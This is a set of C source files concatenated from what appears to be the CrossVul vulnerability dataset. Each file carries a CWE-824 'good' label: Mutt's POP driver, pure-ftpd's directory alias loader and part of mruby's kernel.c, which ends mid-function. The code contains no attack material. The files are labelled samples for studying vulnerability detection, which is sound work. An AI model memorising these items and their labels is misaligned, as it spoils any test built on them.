mutt_progress_update(&progress, i + 1 - old_count, -1);
#ifdef USE_HCACHE
void *data = mutt_hcache_fetch(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data));
if (data)
{
char *uidl = mutt_str_strdup(ctx->hdrs[i]->data);
int refno = ctx->hdrs[i]->refno;
int index = ctx->hdrs[i]->index;
/*
* - POP dynamically numbers headers and relies on h->refno
* to map messages; so restore header and overwrite restored
* refno with current refno, same for index
* - h->data needs to a separate pointer as it's driver-specific
* data freed separately elsewhere
* (the old h->data should point inside a malloc'd block from
* hcache so there shouldn't be a memleak here)
*/
struct Header *h = mutt_hcache_restore((unsigned char *) data);
mutt_hcache_free(hc, &data);
mutt_header_free(&ctx->hdrs[i]);
ctx->hdrs[i] = h;
ctx->hdrs[i]->refno = refno;
ctx->hdrs[i]->index = index;
ctx->hdrs[i]->data = uidl;
ret = 0;
hcached = true;
}
else
#endif
if ((ret = pop_read_header(pop_data, ctx->hdrs[i])) < 0)
break;
#ifdef USE_HCACHE
else
{
mutt_hcache_store(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data),
ctx->hdrs[i], 0);
}
#endif
/*
* faked support for flags works like this:
* - if 'hcached' is true, we have the message in our hcache:
* - if we also have a body: read
* - if we don't have a body: old
* (if $mark_old is set which is maybe wrong as
* $mark_old should be considered for syncing the
* folder and not when opening it XXX)
* - if 'hcached' is false, we don't have the message in our hcache:
* - if we also have a body: read
* - if we don't have a body: new
*/
const bool bcached =
(mutt_bcache_exists(pop_data->bcache, cache_id(ctx->hdrs[i]->data)) == 0);
ctx->hdrs[i]->old = false;
ctx->hdrs[i]->read = false;
if (hcached)
{
if (bcached)
ctx->hdrs[i]->read = true;
else if (MarkOld)
ctx->hdrs[i]->old = true;
}
else
{
if (bcached)
ctx->hdrs[i]->read = true;
}
ctx->msgcount++;
}
if (i > old_count)
mx_update_context(ctx, i - old_count);
}
#ifdef USE_HCACHE
mutt_hcache_close(hc);
#endif
if (ret < 0)
{
for (int i = ctx->msgcount; i < new_count; i++)
mutt_header_free(&ctx->hdrs[i]);
return ret;
}
/* after putting the result into our structures,
* clean up cache, i.e. wipe messages deleted outside
* the availability of our cache
*/
if (MessageCacheClean)
mutt_bcache_list(pop_data->bcache, msg_cache_check, (void *) ctx);
mutt_clear_error();
return (new_count - old_count);
}
/**
* pop_open_mailbox - open POP mailbox, fetch only headers
* @param ctx Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_open_mailbox(struct Context *ctx)
{
char buf[PATH_MAX];
struct Connection *conn = NULL;
struct Account acct;
struct PopData *pop_data = NULL;
struct Url url;
if (pop_parse_path(ctx->path, &acct))
{
mutt_error(_("%s is an invalid POP path"), ctx->path);
return -1;
}
mutt_account_tourl(&acct, &url);
url.path = NULL;
url_tostring(&url, buf, sizeof(buf), 0);
conn = mutt_conn_find(NULL, &acct);
if (!conn)
return -1;
FREE(&ctx->path);
FREE(&ctx->realpath);
ctx->path = mutt_str_strdup(buf);
ctx->realpath = mutt_str_strdup(ctx->path);
pop_data = mutt_mem_calloc(1, sizeof(struct PopData));
pop_data->conn = conn;
ctx->data = pop_data;
if (pop_open_connection(pop_data) < 0)
return -1;
conn->data = pop_data;
pop_data->bcache = mutt_bcache_open(&acct, NULL);
/* init (hard-coded) ACL rights */
memset(ctx->rights, 0, sizeof(ctx->rights));
mutt_bit_set(ctx->rights, MUTT_ACL_SEEN);
mutt_bit_set(ctx->rights, MUTT_ACL_DELETE);
#ifdef USE_HCACHE
/* flags are managed using header cache, so it only makes sense to
* enable them in that case */
mutt_bit_set(ctx->rights, MUTT_ACL_WRITE);
#endif
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
ctx->size = pop_data->size;
mutt_message(_("Fetching list of messages..."));
const int ret = pop_fetch_headers(ctx);
if (ret >= 0)
return 0;
if (ret < -1)
{
mutt_sleep(2);
return -1;
}
}
}
/**
* pop_clear_cache - delete all cached messages
* @param pop_data POP server data
*/
static void pop_clear_cache(struct PopData *pop_data)
{
if (!pop_data->clear_cache)
return;
mutt_debug(1, "delete cached messages\n");
for (int i = 0; i < POP_CACHE_LEN; i++)
{
if (pop_data->cache[i].path)
{
unlink(pop_data->cache[i].path);
FREE(&pop_data->cache[i].path);
}
}
}
/**
* pop_close_mailbox - close POP mailbox
* @param ctx Mailbox Context
* @retval 0 Always
*/
static int pop_close_mailbox(struct Context *ctx)
{
struct PopData *pop_data = (struct PopData *) ctx->data;
if (!pop_data)
return 0;
pop_logout(ctx);
if (pop_data->status != POP_NONE)
mutt_socket_close(pop_data->conn);
pop_data->status = POP_NONE;
pop_data->clear_cache = true;
pop_clear_cache(pop_data);
if (!pop_data->conn->data)
mutt_socket_free(pop_data->conn);
mutt_bcache_close(&pop_data->bcache);
return 0;
}
/**
* pop_fetch_message - fetch message from POP server
* @param ctx Mailbox Context
* @param msg Message
* @param msgno Message number
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_fetch_message(struct Context *ctx, struct Message *msg, int msgno)
{
void *uidl = NULL;
char buf[LONG_STRING];
char path[PATH_MAX];
struct Progress progressbar;
struct PopData *pop_data = (struct PopData *) ctx->data;
struct PopCache *cache = NULL;
struct Header *h = ctx->hdrs[msgno];
unsigned short bcache = 1;
/* see if we already have the message in body cache */
msg->fp = mutt_bcache_get(pop_data->bcache, cache_id(h->data));
if (msg->fp)
return 0;
/*
* see if we already have the message in our cache in
* case $message_cachedir is unset
*/
cache = &pop_data->cache[h->index % POP_CACHE_LEN];
if (cache->path)
{
if (cache->index == h->index)
{
/* yes, so just return a pointer to the message */
msg->fp = fopen(cache->path, "r");
if (msg->fp)
return 0;
mutt_perror(cache->path);
return -1;
}
else
{
/* clear the previous entry */
unlink(cache->path);
FREE(&cache->path);
}
}
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
/* verify that massage index is correct */
if (h->refno < 0)
{
mutt_error(
_("The message index is incorrect. Try reopening the mailbox."));
return -1;
}
mutt_progress_init(&progressbar, _("Fetching message..."), MUTT_PROGRESS_SIZE,
NetInc, h->content->length + h->content->offset - 1);
/* see if we can put in body cache; use our cache as fallback */
msg->fp = mutt_bcache_put(pop_data->bcache, cache_id(h->data));
if (!msg->fp)
{
/* no */
bcache = 0;
mutt_mktemp(path, sizeof(path));
msg->fp = mutt_file_fopen(path, "w+");
if (!msg->fp)
{
mutt_perror(path);
return -1;
}
}
snprintf(buf, sizeof(buf), "RETR %d\r\n", h->refno);
const int ret = pop_fetch_data(pop_data, buf, &progressbar, fetch_message, msg->fp);
if (ret == 0)
break;
mutt_file_fclose(&msg->fp);
/* if RETR failed (e.g. connection closed), be sure to remove either
* the file in bcache or from POP's own cache since the next iteration
* of the loop will re-attempt to put() the message */
if (!bcache)
unlink(path);
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
return -1;
}
if (ret == -3)
{
mutt_error(_("Can't write message to temporary file!"));
return -1;
}
}
/* Update the header information. Previously, we only downloaded a
* portion of the headers, those required for the main display.
*/
if (bcache)
mutt_bcache_commit(pop_data->bcache, cache_id(h->data));
else
{
cache->index = h->index;
cache->path = mutt_str_strdup(path);
}
rewind(msg->fp);
uidl = h->data;
/* we replace envelop, key in subj_hash has to be updated as well */
if (ctx->subj_hash && h->env->real_subj)
mutt_hash_delete(ctx->subj_hash, h->env->real_subj, h);
mutt_label_hash_remove(ctx, h);
mutt_env_free(&h->env);
h->env = mutt_rfc822_read_header(msg->fp, h, 0, 0);
if (ctx->subj_hash && h->env->real_subj)
mutt_hash_insert(ctx->subj_hash, h->env->real_subj, h);
mutt_label_hash_add(ctx, h);
h->data = uidl;
h->lines = 0;
fgets(buf, sizeof(buf), msg->fp);
while (!feof(msg->fp))
{
ctx->hdrs[msgno]->lines++;
fgets(buf, sizeof(buf), msg->fp);
}
h->content->length = ftello(msg->fp) - h->content->offset;
/* This needs to be done in case this is a multipart message */
if (!WithCrypto)
h->security = crypt_query(h->content);
mutt_clear_error();
rewind(msg->fp);
return 0;
}
/**
* pop_close_message - Close POP Message
* @param ctx Mailbox Context
* @param msg Message
* @retval 0 Success
* @retval EOF Error, see errno
*/
static int pop_close_message(struct Context *ctx, struct Message *msg)
{
return mutt_file_fclose(&msg->fp);
}
/**
* pop_sync_mailbox - update POP mailbox, delete messages from server
* @param ctx Mailbox Context
* @param index_hint Current Message
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_sync_mailbox(struct Context *ctx, int *index_hint)
{
int i, j, ret = 0;
char buf[LONG_STRING];
struct PopData *pop_data = (struct PopData *) ctx->data;
struct Progress progress;
#ifdef USE_HCACHE
header_cache_t *hc = NULL;
#endif
pop_data->check_time = 0;
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
mutt_progress_init(&progress, _("Marking messages deleted..."),
MUTT_PROGRESS_MSG, WriteInc, ctx->deleted);
#ifdef USE_HCACHE
hc = pop_hcache_open(pop_data, ctx->path);
#endif
for (i = 0, j = 0, ret = 0; ret == 0 && i < ctx->msgcount; i++)
{
if (ctx->hdrs[i]->deleted && ctx->hdrs[i]->refno != -1)
{
j++;
if (!ctx->quiet)
mutt_progress_update(&progress, j, -1);
snprintf(buf, sizeof(buf), "DELE %d\r\n", ctx->hdrs[i]->refno);
ret = pop_query(pop_data, buf, sizeof(buf));
if (ret == 0)
{
mutt_bcache_del(pop_data->bcache, cache_id(ctx->hdrs[i]->data));
#ifdef USE_HCACHE
mutt_hcache_delete(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data));
#endif
}
}
#ifdef USE_HCACHE
if (ctx->hdrs[i]->changed)
{
mutt_hcache_store(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data),
ctx->hdrs[i], 0);
}
#endif
}
#ifdef USE_HCACHE
mutt_hcache_close(hc);
#endif
if (ret == 0)
{
mutt_str_strfcpy(buf, "QUIT\r\n", sizeof(buf));
ret = pop_query(pop_data, buf, sizeof(buf));
}
if (ret == 0)
{
pop_data->clear_cache = true;
pop_clear_cache(pop_data);
pop_data->status = POP_DISCONNECTED;
return 0;
}
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
return -1;
}
}
}
/**
* pop_check_mailbox - Check for new messages and fetch headers
* @param ctx Mailbox Context
* @param index_hint Current Message
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_check_mailbox(struct Context *ctx, int *index_hint)
{
int ret;
struct PopData *pop_data = (struct PopData *) ctx->data;
if ((pop_data->check_time + PopCheckinterval) > time(NULL))
return 0;
pop_logout(ctx);
mutt_socket_close(pop_data->conn);
if (pop_open_connection(pop_data) < 0)
return -1;
ctx->size = pop_data->size;
mutt_message(_("Checking for new messages..."));
ret = pop_fetch_headers(ctx);
pop_clear_cache(pop_data);
if (ret < 0)
return -1;
if (ret > 0)
return MUTT_NEW_MAIL;
return 0;
}
/**
* pop_fetch_mail - Fetch messages and save them in $spoolfile
*/
void pop_fetch_mail(void)
{
char buffer[LONG_STRING];
char msgbuf[SHORT_STRING];
char *url = NULL, *p = NULL;
int delanswer, last = 0, msgs, bytes, rset = 0, ret;
struct Connection *conn = NULL;
struct Context ctx;
struct Message *msg = NULL;
struct Account acct;
struct PopData *pop_data = NULL;
if (!PopHost)
{
mutt_error(_("POP host is not defined."));
return;
}
url = p = mutt_mem_calloc(strlen(PopHost) + 7, sizeof(char));
if (url_check_scheme(PopHost) == U_UNKNOWN)
{
strcpy(url, "pop://");
p = strchr(url, '\0');
}
strcpy(p, PopHost);
ret = pop_parse_path(url, &acct);
FREE(&url);
if (ret)
{
mutt_error(_("%s is an invalid POP path"), PopHost);
return;
}
conn = mutt_conn_find(NULL, &acct);
if (!conn)
return;
pop_data = mutt_mem_calloc(1, sizeof(struct PopData));
pop_data->conn = conn;
if (pop_open_connection(pop_data) < 0)
{
mutt_socket_free(pop_data->conn);
FREE(&pop_data);
return;
}
conn->data = pop_data;
mutt_message(_("Checking for new messages..."));
/* find out how many messages are in the mailbox. */
mutt_str_strfcpy(buffer, "STAT\r\n", sizeof(buffer));
ret = pop_query(pop_data, buffer, sizeof(buffer));
if (ret == -1)
goto fail;
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
goto finish;
}
sscanf(buffer, "+OK %d %d", &msgs, &bytes);
/* only get unread messages */
if (msgs > 0 && PopLast)
{
mutt_str_strfcpy(buffer, "LAST\r\n", sizeof(buffer));
ret = pop_query(pop_data, buffer, sizeof(buffer));
if (ret == -1)
goto fail;
if (ret == 0)
sscanf(buffer, "+OK %d", &last);
}
if (msgs <= last)
{
mutt_message(_("No new mail in POP mailbox."));
goto finish;
}
if (mx_mbox_open(NONULL(Spoolfile), MUTT_APPEND, &ctx) == NULL)
goto finish;
delanswer = query_quadoption(PopDelete, _("Delete messages from server?"));
snprintf(msgbuf, sizeof(msgbuf),
ngettext("Reading new messages (%d byte)...",
"Reading new messages (%d bytes)...", bytes),
bytes);
mutt_message("%s", msgbuf);
for (int i = last + 1; i <= msgs; i++)
{
msg = mx_msg_open_new(&ctx, NULL, MUTT_ADD_FROM);
if (!msg)
ret = -3;
else
{
snprintf(buffer, sizeof(buffer), "RETR %d\r\n", i);
ret = pop_fetch_data(pop_data, buffer, NULL, fetch_message, msg->fp);
if (ret == -3)
rset = 1;
if (ret == 0 && mx_msg_commit(&ctx, msg) != 0)
{
rset = 1;
ret = -3;
}
mx_msg_close(&ctx, &msg);
}
if (ret == 0 && delanswer == MUTT_YES)
{
/* delete the message on the server */
snprintf(buffer, sizeof(buffer), "DELE %d\r\n", i);
ret = pop_query(pop_data, buffer, sizeof(buffer));
}
if (ret == -1)
{
mx_mbox_close(&ctx, NULL);
goto fail;
}
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
break;
}
if (ret == -3)
{
mutt_error(_("Error while writing mailbox!"));
break;
}
/* L10N: The plural is picked by the second numerical argument, i.e.
* the %d right before 'messages', i.e. the total number of messages. */
mutt_message(ngettext("%s [%d of %d message read]",
"%s [%d of %d messages read]", msgs - last),
msgbuf, i - last, msgs - last);
}
mx_mbox_close(&ctx, NULL);
if (rset)
{
/* make sure no messages get deleted */
mutt_str_strfcpy(buffer, "RSET\r\n", sizeof(buffer));
if (pop_query(pop_data, buffer, sizeof(buffer)) == -1)
goto fail;
}
finish:
/* exit gracefully */
mutt_str_strfcpy(buffer, "QUIT\r\n", sizeof(buffer));
if (pop_query(pop_data, buffer, sizeof(buffer)) == -1)
goto fail;
mutt_socket_close(conn);
FREE(&pop_data);
return;
fail:
mutt_error(_("Server closed connection!"));
mutt_socket_close(conn);
FREE(&pop_data);
}
// clang-format off
/**
* mx_pop_ops - Mailbox callback functions for POP mailboxes
*/
struct MxOps mx_pop_ops = {
.mbox_open = pop_open_mailbox,
.mbox_open_append = NULL,
.mbox_check = pop_check_mailbox,
.mbox_sync = pop_sync_mailbox,
.mbox_close = pop_close_mailbox,
.msg_open = pop_fetch_message,
.msg_open_new = NULL,
.msg_commit = NULL,
.msg_close = pop_close_message,
.tags_edit = NULL,
.tags_commit = NULL,
};
// clang-format on
| ./CrossVul/dataset_final_sorted/CWE-824/c/good_250_0 |
crossvul-cpp_data_good_4684_0 | /*
0) alias file format.
alternating lines of alias and dir
(this enables embedded whitespace in dir and alias without quoting rules)
optional blank lines
optional lines beginning with '#' as comments
(no you can't put a '#' just anywhere)
1) data structure for alias list nodes.
typedef struct DirAlias_ {
char *alias;
char *dir;
struct DirAlias *next;
} DirAlias;
2) init routine
A) open alias file
B) while not EOF do
read line
parse line
dir must begin with "/"
allocate DirAlias and members
if tail is NULL then head and tail (global DirAlias_t pointers)
are set to member
else tail->next is set to member and then tail is set to member
3) lookup routine
A) given potential alias return dir or NULL
(walk list starting with head looking for match)
4) FTP CWD command mods
A) if chdir() fails try alias (use lookup routine)
5) FTP SITE ALIAS command
A) list aliases
*/
#include <config.h>
#ifdef WITH_DIRALIASES
#include "ftpd.h"
#include "messages.h"
#include "diraliases.h"
#ifdef WITH_DMALLOC
# include <dmalloc.h>
#endif
static DirAlias *head, *tail;
static signed char aliases_up;
/* returns: 0 on success, -1 on failure */
int init_aliases(void)
{
FILE *fp;
char alias[MAXALIASLEN + 1U];
char dir[PATH_MAX + 1U];
if ((fp = fopen(ALIASES_FILE, "r")) == NULL) {
return 0;
}
while (fgets(alias, sizeof alias, fp) != NULL) {
if (*alias == '#' || *alias == '\n' || *alias == 0) {
continue;
}
{
char * const z = alias + strlen(alias) - 1U;
if (*z != '\n') {
goto bad;
}
*z = 0;
}
do {
if (fgets(dir, sizeof dir, fp) == NULL || *dir == 0) {
goto bad;
}
{
char * const z = dir + strlen(dir) - 1U;
if (*z == '\n') {
*z = 0;
}
}
} while (*dir == '#' || *dir == 0);
if (head == NULL) {
if ((head = tail = malloc(sizeof *head)) == NULL ||
(tail->alias = strdup(alias)) == NULL ||
(tail->dir = strdup(dir)) == NULL) {
die_mem();
}
} else {
DirAlias *curr;
if ((curr = malloc(sizeof *curr)) == NULL ||
(curr->alias = strdup(alias)) == NULL ||
(curr->dir = strdup(dir)) == NULL) {
die_mem();
}
tail->next = curr;
tail = curr;
}
tail->next = NULL;
}
fclose(fp);
aliases_up++;
return 0;
bad:
fclose(fp);
logfile(LOG_ERR, MSG_ALIASES_BROKEN_FILE " [" ALIASES_FILE "]");
return -1;
}
char *lookup_alias(const char *alias)
{
const DirAlias *curr = head;
if (aliases_up == 0) {
return NULL;
}
while (curr != NULL) {
if (strcmp(curr->alias, alias) == 0) {
return curr->dir;
}
curr = curr->next;
}
return NULL;
}
void print_aliases(void)
{
const DirAlias *curr = head;
if (aliases_up == 0) {
addreply_noformat(502, MSG_CONF_ERR);
return;
}
addreply_noformat(214, MSG_ALIASES_LIST);
while (curr != NULL) {
char line[MAXALIASLEN + PATH_MAX + 3U];
snprintf(line, sizeof line, " %s %s", curr->alias, curr->dir);
addreply_noformat(0, line);
curr = curr->next;
}
addreply_noformat(214, " ");
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-824/c/good_4684_0 |
crossvul-cpp_data_good_168_0 | /*
** kernel.c - Kernel module
**
** See Copyright Notice in mruby.h
*/
#include <mruby.h>
#include <mruby/array.h>
#include <mruby/hash.h>
#include <mruby/class.h>
#include <mruby/proc.h>
#include <mruby/string.h>
#include <mruby/variable.h>
#include <mruby/error.h>
#include <mruby/istruct.h>
typedef enum {
NOEX_PUBLIC = 0x00,
NOEX_NOSUPER = 0x01,
NOEX_PRIVATE = 0x02,
NOEX_PROTECTED = 0x04,
NOEX_MASK = 0x06,
NOEX_BASIC = 0x08,
NOEX_UNDEF = NOEX_NOSUPER,
NOEX_MODFUNC = 0x12,
NOEX_SUPER = 0x20,
NOEX_VCALL = 0x40,
NOEX_RESPONDS = 0x80
} mrb_method_flag_t;
MRB_API mrb_bool
mrb_func_basic_p(mrb_state *mrb, mrb_value obj, mrb_sym mid, mrb_func_t func)
{
mrb_method_t m = mrb_method_search(mrb, mrb_class(mrb, obj), mid);
struct RProc *p;
if (MRB_METHOD_UNDEF_P(m)) return FALSE;
if (MRB_METHOD_FUNC_P(m))
return MRB_METHOD_FUNC(m) == func;
p = MRB_METHOD_PROC(m);
if (MRB_PROC_CFUNC_P(p) && (MRB_PROC_CFUNC(p) == func))
return TRUE;
return FALSE;
}
static mrb_bool
mrb_obj_basic_to_s_p(mrb_state *mrb, mrb_value obj)
{
return mrb_func_basic_p(mrb, obj, mrb_intern_lit(mrb, "to_s"), mrb_any_to_s);
}
/* 15.3.1.3.17 */
/*
* call-seq:
* obj.inspect -> string
*
* Returns a string containing a human-readable representation of
* <i>obj</i>. If not overridden and no instance variables, uses the
* <code>to_s</code> method to generate the string.
* <i>obj</i>. If not overridden, uses the <code>to_s</code> method to
* generate the string.
*
* [ 1, 2, 3..4, 'five' ].inspect #=> "[1, 2, 3..4, \"five\"]"
* Time.new.inspect #=> "2008-03-08 19:43:39 +0900"
*/
MRB_API mrb_value
mrb_obj_inspect(mrb_state *mrb, mrb_value obj)
{
if ((mrb_type(obj) == MRB_TT_OBJECT) && mrb_obj_basic_to_s_p(mrb, obj)) {
return mrb_obj_iv_inspect(mrb, mrb_obj_ptr(obj));
}
return mrb_any_to_s(mrb, obj);
}
/* 15.3.1.3.2 */
/*
* call-seq:
* obj === other -> true or false
*
* Case Equality---For class <code>Object</code>, effectively the same
* as calling <code>#==</code>, but typically overridden by descendants
* to provide meaningful semantics in <code>case</code> statements.
*/
static mrb_value
mrb_equal_m(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "o", &arg);
return mrb_bool_value(mrb_equal(mrb, self, arg));
}
/* 15.3.1.3.3 */
/* 15.3.1.3.33 */
/*
* Document-method: __id__
* Document-method: object_id
*
* call-seq:
* obj.__id__ -> fixnum
* obj.object_id -> fixnum
*
* Returns an integer identifier for <i>obj</i>. The same number will
* be returned on all calls to <code>id</code> for a given object, and
* no two active objects will share an id.
* <code>Object#object_id</code> is a different concept from the
* <code>:name</code> notation, which returns the symbol id of
* <code>name</code>. Replaces the deprecated <code>Object#id</code>.
*/
mrb_value
mrb_obj_id_m(mrb_state *mrb, mrb_value self)
{
return mrb_fixnum_value(mrb_obj_id(self));
}
/* 15.3.1.2.2 */
/* 15.3.1.2.5 */
/* 15.3.1.3.6 */
/* 15.3.1.3.25 */
/*
* call-seq:
* block_given? -> true or false
* iterator? -> true or false
*
* Returns <code>true</code> if <code>yield</code> would execute a
* block in the current context. The <code>iterator?</code> form
* is mildly deprecated.
*
* def try
* if block_given?
* yield
* else
* "no block"
* end
* end
* try #=> "no block"
* try { "hello" } #=> "hello"
* try do "hello" end #=> "hello"
*/
static mrb_value
mrb_f_block_given_p_m(mrb_state *mrb, mrb_value self)
{
mrb_callinfo *ci = &mrb->c->ci[-1];
mrb_callinfo *cibase = mrb->c->cibase;
mrb_value *bp;
struct RProc *p;
if (ci <= cibase) {
/* toplevel does not have block */
return mrb_false_value();
}
p = ci->proc;
/* search method/class/module proc */
while (p) {
if (MRB_PROC_SCOPE_P(p)) break;
p = p->upper;
}
if (p == NULL) return mrb_false_value();
/* search ci corresponding to proc */
while (cibase < ci) {
if (ci->proc == p) break;
ci--;
}
if (ci == cibase) {
return mrb_false_value();
}
else if (ci->env) {
struct REnv *e = ci->env;
int bidx;
/* top-level does not have block slot (always false) */
if (e->stack == mrb->c->stbase)
return mrb_false_value();
/* use saved block arg position */
bidx = MRB_ENV_BIDX(e);
/* bidx may be useless (e.g. define_method) */
if (bidx >= MRB_ENV_STACK_LEN(e))
return mrb_false_value();
bp = &e->stack[bidx];
}
else {
bp = ci[1].stackent+1;
if (ci->argc >= 0) {
bp += ci->argc;
}
else {
bp++;
}
}
if (mrb_nil_p(*bp))
return mrb_false_value();
return mrb_true_value();
}
/* 15.3.1.3.7 */
/*
* call-seq:
* obj.class -> class
*
* Returns the class of <i>obj</i>. This method must always be
* called with an explicit receiver, as <code>class</code> is also a
* reserved word in Ruby.
*
* 1.class #=> Fixnum
* self.class #=> Object
*/
static mrb_value
mrb_obj_class_m(mrb_state *mrb, mrb_value self)
{
return mrb_obj_value(mrb_obj_class(mrb, self));
}
static struct RClass*
mrb_singleton_class_clone(mrb_state *mrb, mrb_value obj)
{
struct RClass *klass = mrb_basic_ptr(obj)->c;
if (klass->tt != MRB_TT_SCLASS)
return klass;
else {
/* copy singleton(unnamed) class */
struct RClass *clone = (struct RClass*)mrb_obj_alloc(mrb, klass->tt, mrb->class_class);
switch (mrb_type(obj)) {
case MRB_TT_CLASS:
case MRB_TT_SCLASS:
break;
default:
clone->c = mrb_singleton_class_clone(mrb, mrb_obj_value(klass));
break;
}
clone->super = klass->super;
if (klass->iv) {
mrb_iv_copy(mrb, mrb_obj_value(clone), mrb_obj_value(klass));
mrb_obj_iv_set(mrb, (struct RObject*)clone, mrb_intern_lit(mrb, "__attached__"), obj);
}
if (klass->mt) {
clone->mt = kh_copy(mt, mrb, klass->mt);
}
else {
clone->mt = kh_init(mt, mrb);
}
clone->tt = MRB_TT_SCLASS;
return clone;
}
}
static void
copy_class(mrb_state *mrb, mrb_value dst, mrb_value src)
{
struct RClass *dc = mrb_class_ptr(dst);
struct RClass *sc = mrb_class_ptr(src);
/* if the origin is not the same as the class, then the origin and
the current class need to be copied */
if (sc->flags & MRB_FLAG_IS_PREPENDED) {
struct RClass *c0 = sc->super;
struct RClass *c1 = dc;
/* copy prepended iclasses */
while (!(c0->flags & MRB_FLAG_IS_ORIGIN)) {
c1->super = mrb_class_ptr(mrb_obj_dup(mrb, mrb_obj_value(c0)));
c1 = c1->super;
c0 = c0->super;
}
c1->super = mrb_class_ptr(mrb_obj_dup(mrb, mrb_obj_value(c0)));
c1->super->flags |= MRB_FLAG_IS_ORIGIN;
}
if (sc->mt) {
dc->mt = kh_copy(mt, mrb, sc->mt);
}
else {
dc->mt = kh_init(mt, mrb);
}
dc->super = sc->super;
MRB_SET_INSTANCE_TT(dc, MRB_INSTANCE_TT(sc));
}
static void
init_copy(mrb_state *mrb, mrb_value dest, mrb_value obj)
{
switch (mrb_type(obj)) {
case MRB_TT_ICLASS:
copy_class(mrb, dest, obj);
return;
case MRB_TT_CLASS:
case MRB_TT_MODULE:
copy_class(mrb, dest, obj);
mrb_iv_copy(mrb, dest, obj);
mrb_iv_remove(mrb, dest, mrb_intern_lit(mrb, "__classname__"));
break;
case MRB_TT_OBJECT:
case MRB_TT_SCLASS:
case MRB_TT_HASH:
case MRB_TT_DATA:
case MRB_TT_EXCEPTION:
mrb_iv_copy(mrb, dest, obj);
break;
case MRB_TT_ISTRUCT:
mrb_istruct_copy(dest, obj);
break;
default:
break;
}
mrb_funcall(mrb, dest, "initialize_copy", 1, obj);
}
/* 15.3.1.3.8 */
/*
* call-seq:
* obj.clone -> an_object
*
* Produces a shallow copy of <i>obj</i>---the instance variables of
* <i>obj</i> are copied, but not the objects they reference. Copies
* the frozen state of <i>obj</i>. See also the discussion
* under <code>Object#dup</code>.
*
* class Klass
* attr_accessor :str
* end
* s1 = Klass.new #=> #<Klass:0x401b3a38>
* s1.str = "Hello" #=> "Hello"
* s2 = s1.clone #=> #<Klass:0x401b3998 @str="Hello">
* s2.str[1,4] = "i" #=> "i"
* s1.inspect #=> "#<Klass:0x401b3a38 @str=\"Hi\">"
* s2.inspect #=> "#<Klass:0x401b3998 @str=\"Hi\">"
*
* This method may have class-specific behavior. If so, that
* behavior will be documented under the #+initialize_copy+ method of
* the class.
*
* Some Class(True False Nil Symbol Fixnum Float) Object cannot clone.
*/
MRB_API mrb_value
mrb_obj_clone(mrb_state *mrb, mrb_value self)
{
struct RObject *p;
mrb_value clone;
if (mrb_immediate_p(self)) {
mrb_raisef(mrb, E_TYPE_ERROR, "can't clone %S", self);
}
if (mrb_type(self) == MRB_TT_SCLASS) {
mrb_raise(mrb, E_TYPE_ERROR, "can't clone singleton class");
}
p = (struct RObject*)mrb_obj_alloc(mrb, mrb_type(self), mrb_obj_class(mrb, self));
p->c = mrb_singleton_class_clone(mrb, self);
mrb_field_write_barrier(mrb, (struct RBasic*)p, (struct RBasic*)p->c);
clone = mrb_obj_value(p);
init_copy(mrb, clone, self);
return clone;
}
/* 15.3.1.3.9 */
/*
* call-seq:
* obj.dup -> an_object
*
* Produces a shallow copy of <i>obj</i>---the instance variables of
* <i>obj</i> are copied, but not the objects they reference.
* <code>dup</code> copies the frozen state of <i>obj</i>. See also
* the discussion under <code>Object#clone</code>. In general,
* <code>clone</code> and <code>dup</code> may have different semantics
* in descendant classes. While <code>clone</code> is used to duplicate
* an object, including its internal state, <code>dup</code> typically
* uses the class of the descendant object to create the new instance.
*
* This method may have class-specific behavior. If so, that
* behavior will be documented under the #+initialize_copy+ method of
* the class.
*/
MRB_API mrb_value
mrb_obj_dup(mrb_state *mrb, mrb_value obj)
{
struct RBasic *p;
mrb_value dup;
if (mrb_immediate_p(obj)) {
mrb_raisef(mrb, E_TYPE_ERROR, "can't dup %S", obj);
}
if (mrb_type(obj) == MRB_TT_SCLASS) {
mrb_raise(mrb, E_TYPE_ERROR, "can't dup singleton class");
}
p = mrb_obj_alloc(mrb, mrb_type(obj), mrb_obj_class(mrb, obj));
dup = mrb_obj_value(p);
init_copy(mrb, dup, obj);
return dup;
}
static mrb_value
mrb_obj_extend(mrb_state *mrb, mrb_int argc, mrb_value *argv, mrb_value obj)
{
mrb_int i;
if (argc == 0) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "wrong number of arguments (at least 1)");
}
for (i = 0; i < argc; i++) {
mrb_check_type(mrb, argv[i], MRB_TT_MODULE);
}
while (argc--) {
mrb_funcall(mrb, argv[argc], "extend_object", 1, obj);
mrb_funcall(mrb, argv[argc], "extended", 1, obj);
}
return obj;
}
/* 15.3.1.3.13 */
/*
* call-seq:
* obj.extend(module, ...) -> obj
*
* Adds to _obj_ the instance methods from each module given as a
* parameter.
*
* module Mod
* def hello
* "Hello from Mod.\n"
* end
* end
*
* class Klass
* def hello
* "Hello from Klass.\n"
* end
* end
*
* k = Klass.new
* k.hello #=> "Hello from Klass.\n"
* k.extend(Mod) #=> #<Klass:0x401b3bc8>
* k.hello #=> "Hello from Mod.\n"
*/
static mrb_value
mrb_obj_extend_m(mrb_state *mrb, mrb_value self)
{
mrb_value *argv;
mrb_int argc;
mrb_get_args(mrb, "*", &argv, &argc);
return mrb_obj_extend(mrb, argc, argv, self);
}
static mrb_value
mrb_obj_freeze(mrb_state *mrb, mrb_value self)
{
struct RBasic *b;
switch (mrb_type(self)) {
case MRB_TT_FALSE:
case MRB_TT_TRUE:
case MRB_TT_FIXNUM:
case MRB_TT_SYMBOL:
#ifndef MRB_WITHOUT_FLOAT
case MRB_TT_FLOAT:
#endif
return self;
default:
break;
}
